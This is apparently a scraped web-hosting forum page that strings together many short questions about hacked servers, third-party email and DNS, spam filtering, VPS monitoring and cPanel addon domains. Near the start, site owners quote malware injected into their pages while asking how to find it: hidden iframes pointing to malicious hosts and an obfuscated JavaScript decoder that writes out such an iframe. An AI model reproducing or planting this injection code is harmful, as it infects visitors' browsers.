Which 3rd Party Addon Script Do You Find Getting Hacked The Most?
Jun 6, 2009Hosters: Which 3rd party addon script do you find getting hacked the most?
View 11 RepliesHosters: Which 3rd party addon script do you find getting hacked the most?
View 11 RepliesMy server was being hacked, I can find some HTML and PHP files which inserted the codes similar to the following by the hacker.
HTML Code:
<iframe src="http://a5g.ru:8080/ts/in.cgi?pepsi94" width=125 height=125 style="visibility: hidden"><
/iframe>
The inserted iframe src is not the same among the hacked files.
I am trying to find out all the hacked files on server, is there any way instead of checking the files manually?
Many of my websites on my server have been hacked, it randomly add's
Code:
<!--iframe width=1 height=1 border=0 frameborder=0 src=[url]-->
Code:
<!--iframe width=1 height=1 border=0 frameborder=0 src=[url]-->
and
Code:
<!--iframe width=1 height=1 border=0 frameborder=0 src='http://aboutmynews.org/news/InF.php' style='display:none;'></iframe--><!-- ~ --><script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,49,46,22,39,35,15,23,8,28,0,0,0,0,0,0,2,25,55,54,30,40,13,57,14,12,53,47,43,19,38,3,37,33,58,18,36,44,20,24,51,60,29,0,0,0,0,41,0,0,45,48,9,32,17,59,31,6,61,5,4,7,27,50,56,62,34,10,52,1,16,21,26,42,11);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}dc("kNdXOhF18O9QSX9cfBINV3WXaXUcFmFNV3p1shZcahFNw3pc7MIoahUo7mIc75APkxjJi5_eFmZtw0_rssFcmOAt7ObJfKE1s5UrzKIcSnbrIK9caBjrwB9J@3EJfXZoa5_euXUJw4I190GosKIcDspNAy8XOhF18OYN")</script><!-- ~ -->
To some of my pages on my websites in my /home directory.
Please do not visit the links without anti virus protection.
what command I can use to search all of my files in my home directory for this?
I am being hacked & I don't know how they are getting files on my server. They are doing it on two of my domains, I suspended one and then they got it on the other. My FTP access log does not show anything suspicious..
How can I find their doorway?
how can i do a search for all files (probs using regex) of files consisting purely of numbers?
for e.g. find:
53243.php
24353.php
24098.php
(always have 5 numbers).
seems one of my accounts has had some script run which generated a bunch of these in various subfolders, and the php file basically does a callback to www3.rssnews.ws and www3.xmldata.info, which seem to be some sort of spyware servers.
I guess they have a system in place so that they will automatically be directed calls if the "rep" is not busy and my call got directed to a desk with no operator and I heard them having a party in the background. How completely professional!
Also, their telephone system is completely broken and you'll always get a pissed off sales rep in the middle of the day because they will automatically be directed calls because their hold system is broken.
I'm 1 week into my first server and I need to know, What are some must-have 3rd Party Software for my server?
View 6 Replies View Relatedif you use a 3rd party for email provision (eg everyone.net) and you alter cname and mx to point to everyone.net do you
- need spamassasin on the VPS ?
- turn off email services on the VPS and therefore save ram and cpu power?
- still have the ability to generate email via scripts and send from the server?
I have security concerns with my current hosting of eCommerce sites. The hosts responses to my specific concerns are vague and unsatisfactory. Even when anomalies are pointed out, ( i.e A traffic domain was suddenly pointing to an IP on a server in another country) they return answers like, "Yes, there was a problem, but its all fine now."
I have considered moving to a new host, however, for price reasons, I like my current host.
This has caused me to consider having the security of my server checked and perhaps managed by a third party.
I have no experience with choosing such a service, and research so far has raised more concerns than answers as to how and what may happen by requesting the use of such a service, the reputability of said service providers, and the costs of implementing the recommendations etc.
My main concern is to do with Mysql database manipulation and DNS manipulation within the network. However, a general server vulnerability assessment would be assumed beneficial.
Is there any third party free VPS internet connection monitoring service that notifies when there is no internet connection?... I know there are lots of website uptime montioring services.... but I use VPS for using windows applications and no web page and I need to know if there is an internet connection failure...... Is there any third party service that checks this and it will not be hosted by me but the service ?.... I need to know when there is a fialure in the internet connection... It can ping or use other ways...
Another thing I am looking for is a software that notifies me by email when the windows VPS is restarted without my attendance....
especially for the internet monitoring?
I use a third-party DNS host for a domain hosted on a shared server with cpanel. The A record point to that server so that the website on it is shown, and for e-mail, it uses a different server.
How does the domain have to configured on the cpanel server, the one that hosts the website, so that e-mail originating from within it go to the external mail server?
And a related question - after the necessary changes are done, can the cpanel server still send e-mail with that domain name (say, if a script attempts to send an a message)?
Anybody using 2 different 3rd party Managed DNS services like dnsmadeeasy.com and ultradns.com on same domain name ?
Reason for doing it is because we are having resolving issues also the domain name is ".in" not ".com/net/org".
Now we have added nameservers of both the providers in the domain registrar control panel. Total it has 8 name servers now.
I copy pasted exactly same A records & Mx record and same ttl.
Q1) The NS records on both the dns services are Different. Should i add the 1st dns providers 4 nameservers in the 2nd dns providers panel and viceversa?
Q2) will this setup work anybody done it before .. does create problems?
Basically I want e-mails to myself going to a third party exchange mailbox provider and the other mailboxes for my domain going into their own mailboxes on my webhost server.
Is this possible?
I have servers with softlayer current paying $2000 a month for 3 dedicated servers. THey are set up and work perfectly.
Issue is i was not aware that softlayer doesnt do "managed" support, would like to know if anyone has a good third party company that works with softlayer.
the tools they have on the portal our great so really would like to find a company thatworks with them. the co that softlayer suggested doesnt do windows support go figure!
I have been running my own spam protection on a dedicated server for a few years now. On the whole I probably catch 95% of spam.
Having just built a new server to replace my old one I'm keep to re-evaluate how I filter spam.
I am particularly interested in 3rd party filtering via MX records (why bother using my resources when I can pay someone a small amount to do a much better job than me?).
Can you recommend any providers?
I have used Postini in the past and like them but I can't find many resellers (I've seen a few references to $1 accounts on WHT..?)
I need a solution for approx 10 domains and 4 actual mailboxes (with quite a few aliases across all domains per mailbox).
I have latest VZ panel
i have 10 containers running
i have tried everything to how i can limit each container to use bandwidth monthly , i only found a way to limit the outgoing speed/traffic , but i can't limit the traffic usage per month .
i have asked softlayer about that
Hello,
You could limit traffic on a VPS container using 3rd party-softwares.
But you need to look into these software solutions or contact your server administration company.
Anyway, what 3rd party software do you advice in installing,
What i want to do is like i limit container No.107 to not use over 200Gb container No.108 To not use over 300Gb , etc...
I have a CDONTS script which has been sending mail from a client's website form to their address. However, the script has suddenly stopped working. It doesn't error, they just don't receive the mail. I've tried CCing myself in the script and the mail is not getting through. The script itself is tried and tested and syntaxially correct.
I think the problem is because they're using their own exchange server, not the web hosts' mail server. Therefore I would expect that mail sent from the web script wouldn't go through because there is no local mail server to process it.
The problem is that the script hasn't changed, the host say their system hasn't changed, and the client's IT team say their exchange settings haven't changed!
I could set up a CDOSYS script to use their Exchange server to deal with the email, but their IT support won't allow relaying, so I don't think this is possible.
Is connecting to their Exchange box the only option, or should the website host still be able to process the web-script-generated mail despite not being their mail provider? I'm getting a lot of grief here, but it can't be the script that has suddenly broken because nobody has touched it!
I'm finally ready to move from a shared environment to a dedicated server. I don't know anything about server set up and management. Therefore I'm looking for a managed solution.
Reading through this great forum I found out that I can either go with a fully managed solution by the hosting company or go with an self-managed host and hire a third party administrator.
This will be my first dedicated server project. I would like to keep monthly cost below $400. Not necessarily looking for the cheapest deal out there, but rather for good service and stable performance.
I have heard good things about the Planet and liquidweb here on this forum. If I can find a reliable 3rd party management company I might be able to look into softlayer and/limestone.
I'm trying to decide whether I should go with inhouse management or 3rd party management.
Can anyone recommend a hosted third-party spam filtering service for cPanel servers?
Most of the servers are reseller based, and I don't see myself or my team having to enter each individual email address into the service.
With that said, is there any service where you can just point the MX records to it, it would scan the email, and then deliver it?
We switched to a 3rd party mail server provided by our local ISP, however when attempts are made to mail anyone on our domain a message similar to one of the following is received:
Quote:
This is an automatically generated Delivery Status Notification
Delivery to the following recipient failed permanently:
my_email_address@our_domain
Technical details of permanent failure:
PERM_FAILURE: SMTP Error (state 13): 550 5.7.1 <my_email_address@our_domain>... Relaying denied
or
Quote:
Hi. This is the qmail-send program.
I'm afraid I wasn't able to deliver your message to the following addresses.
This is a permanent error; I've given up. Sorry it didn't work out.
<my_email_address@our_domain>:
70.43.63.21 does not like recipient.
Remote host said: 550 5.7.1 <my_email_address@our_domain>... Relaying denied Giving up on 70.43.63.21.
I've made sure the MX records are in place on our nameserver, and I've verified this with DNS Stuff.
I seem to think the problem is on our ISP's end.
Parallels Panel 11.0.9
Ubuntu 12.04.4 LTS
Apache/2.2.22 / Mysql 3.5.8.1
Is it possible to let Plesk allow database creation from another web application ?
For example, we would like to use this framework (codeigniter) method => this->dbforge->create_database('db_name')
ACTUAL RESULT =>
The method returns false but i'm unable to track it on the error logs.
EXPECTED RESULT =>
The method should returns TRUE
And thus the database should be created
Is it some task we should manage at Plesk or Apache level ?
My client has a domain registered at GoDaddy and a Yahoo Small Business email package.
The only info I can find on Yahoo suggests I need to redelegate the domain's name servers to Yahoo, and I'd rather not do this if I can help it.
Is it possible to simply leave the name servers at GoDaddy and point the MX record to Yahoo's servers?
I don't see anything on Yahoo saying it won't work, but then I see nothing to suggest it will either!
Any experiences with Supermicro IPMI Card - (AOC-IPMI20-E)? I need basic Power managment like APC reboot ports.
Since its very likely that we will get some Supermicro servers, I thought why not add the IPMI card.
My Plesk panel (11.5.30) hosts a number of domains that all use Google Apps for Business to host their emails. No emails are hosted on the panel, and the mail server is turned off. So is the DNS server.
Using the mail() php function to send automatic confirmation emails from a website hosted on the panel, they arrive at any address NOT hosted locally, however they fail to arrive at any address whose website is locally hosted.
My initial research suggested that Plesk was routing locally, hence the problem, however the mailserver has been turned off the for domain/webspace.
Been browsing the site and would value your opinions.
Addon domains are supplied by some webhosts and not others, one of the hosts who does not supply any addon domains puts across a good argument that they can overload a server if they get out of control.
How do others apparently manage these with no problems?
When a hosting said: 10 domain addons, does it mean, I can have up to 10 domains with different content?
In other words, the 10 domain will NOT point to the same content.?
i created a script for WHM, and i set it up. It in PHP, it works fine from the admin interface. But when i logon to that addon through a clients interface, it doesn't read the PHP... it just displays the code as if it were a txt file... So i was just wondering is there a way around this? or like PHP is just not meant to be used as for an WHM addon from both admin and client interface?
View 3 Replies View RelatedI recently leased my first VPS. I have my master site setup, and 4 other personal sites that I'll be migrating to the VPS. (Later, I'll be hosting customer sites on the VPS as I develop them.)
My question is, what would be the best way to add my 4 other personal sites to the VPS, as addons to the main domain, or give them each their own account and cPanel and manage them separately?
How would you set it up? (I'm having trouble adding up all the +'s and -'s.)
I have a domain with 2 addon domains added to it.
Lets call the domain1.com and the addons are domain2.com and domain3.com
I transfered the sites from one server to my server and know if I try to goto domain2.com or domain3.com they are not found.
If I goto domain1.com/domain2 (or 3) it works just fine though.
I tried to do the addon domain in cpanel but it is coming up with the following errors.
Bind reloading on server using rndc zone: [domain1.com] The subdomain, domain2.domain1.com has been added.
Error from park wrapper: domain2.com is already configured.
Removed domain2.domain1.com Server at line: 1244. Removed Entry from httpd.conf Bind reloading on server using rndc zone: [domain1.com] The subdomain, domain2.domain1.com has been removed.
domain2.com could not be setup. The subdomain domain2.domain1.com was not setup either.
How can I fix this?
I did try to make domain2 its own account after that, but the script did not work for some reason even though it does if I goto domain1.com/domain2.
I know it must be something simple I am missing, but for the life of me I am drawing a blank.
Also, I moved the site by doing a complete backup in Cpanel and uploaded that to the new server and restored it from the WHM backup screen.